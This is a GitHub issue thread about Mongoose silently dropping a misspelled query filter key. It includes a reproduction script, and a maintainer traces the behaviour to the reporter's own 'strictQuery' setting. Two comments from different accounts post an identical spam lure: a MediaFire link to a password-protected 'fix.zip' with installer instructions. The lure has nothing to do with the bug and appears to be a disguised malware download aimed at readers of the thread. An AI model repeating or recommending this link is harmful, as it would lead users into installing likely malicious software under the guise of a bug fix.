### ISSUE TITLE
mongoose omits filter query parameters, if they are not in the schema, without an error

### ISSUE THREAD

**Issue by 1muen** [Automattic/mongoose#14830]
### Prerequisites

- [X] I have written a descriptive issue title
- [X] I have searched existing issues to ensure the bug has not already been reported

### Mongoose version

8.5.3

### Node.js version

20.9.0

### MongoDB server version

7.0.12

### Typescript version (if applicable)

5.5.4

### Description

If a query parameter doesnt exist in the schema, mongoose omits that filter query parameter.

### Steps to Reproduce

```typescript
import mongoose, { Schema } from "mongoose";

mongoose.set("strictQuery", true);

mongoose.connect("mongodb://admin:admin@mongo:27017", {
    dbName: "mongooseissue",
    autoIndex: true,
    ssl: false
}).catch((e) => {
    console.error(`MongoDB connection FAIL ${(e as Error).message}`);
    process.exit(1);
}).then(async (mong) => {
    const TestSchema: Schema = new Schema(
        {
            tenantID: { type: String, required: true, index: true },
            instanceID: { type: String, required: true },
            test: { type: String, required: true },
        },
        { timestamps: { updatedAt: "lastEdited", createdAt: "created" } }
    );

    TestSchema.pre<any>("save", function (next) {
        this.lastEdited = new Date();
        next();
    });

    const TestModel = mong.model<any>("mongissue", TestSchema);
    await TestModel.deleteMany({})
    await TestModel.create({ tenantID: "1111", instanceID: "dev3", test: "test" })
    await TestModel.create({ tenantID: "1111", instanceID: "dev4", test: "test" })

    const updateTest = async (
        update: any,
        tenantID = "1111",
        instanceId = "dev4"
    ): Promise<any | null> => {
        const previousConfiguration: any = (
            await TestModel.findOneAndUpdate({ tenantID, instanceId}, update).lean().exec()
        );
        console.log("previousConfiguration:", previousConfiguration)
    };

    await updateTest({ test: "adsfasdfasdf" });
});
```
In this example the "instanceId" in the Query has a spelling mistake.
In a verbose mongoDB the query is printed into the log: "query" : {"tenantID" : "1111"}
And dev3 gets updated. (Because its the first one to be found)

### Expected Behavior

I would expect to be warned that the query parameter is not in the schema.
I think I would expect that even if the parameter doesnt exist in the schema, that the query is being done.
It would be best, if we would get warned by @types/mongoose that the filter parameter is not in the schema at compile time/as we develop that mistake.

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vkarpov15** [comment]
Can you please double check what [version of Mongoose](https://mongoosejs.com/docs/check-version.html) you're using by `console.log('Mongoose version:', mongoose.version)` ? The behavior you're describing was Mongoose's default behavior in Mongoose 6, but that behavior was changed in Mongoose 7: https://mongoosejs.com/docs/migrating_to_7.html#strictquery. We ran your script and confirmed that `instanceId` isn't stripped out in Mongoose 8.

**Comment by 1muen** [comment]
Yes, I published it as an github repo, so its easier to reproduce: https://github.com/1muen/mongooseIssue14830
Just run npm run dev and after the update the collection looks like this:
```json
[
  {
    _id: new ObjectId('66cef1ba36944ef491e48853'),
    tenantID: '1111',
    **instanceID: 'dev3',**
    **test: 'adsfasdfasdf',**
    created: 2024-08-28T09:45:30.540Z,
    lastEdited: 2024-08-28T09:45:30.839Z,
    __v: 0
  },
  {
    _id: new ObjectId('66cef1ba36944ef491e48856'),
    tenantID: '1111',
    instanceID: 'dev4',
    test: 'test',
    created: 2024-08-28T09:45:30.837Z,
    lastEdited: 2024-08-28T09:45:30.837Z,
    __v: 0
  }
]
```
instanceId got omitted and test: 'adsfasdfasdf' has been added to the first search result.
The mongoose Version gets logged as Mongoose version: 8.5.4

I tried to reproduce the issue with a Test in the mongoose test suite but didnt succeded in reproducing it:
https://github.com/Automattic/mongoose/compare/master...1muen:mongoose:reproduce-14830

**Comment by 1muen** [comment]
The issue https://github.com/Automattic/mongoose/issues/14826 sounds related.

> if an empty condition appears due to the casting process, it will be removed.
https://github.com/Automattic/mongoose/pull/14749

Why should it be silently removed, if the casting fails? I would have tought that if it fails to cast the query to the schema it would throw an exception.

**Comment by vkarpov15** [comment]
Ah ok I see what the issue is, why do you have `mongoose.set("strictQuery", true);`? You're opting in to the behavior of stripping out unknown keys from the query. Just remove that line and your script will work as expected.

"Why should it be silently removed, if the casting fails?" <-- unknown keys aren't considered a cast error by default in Mongoose
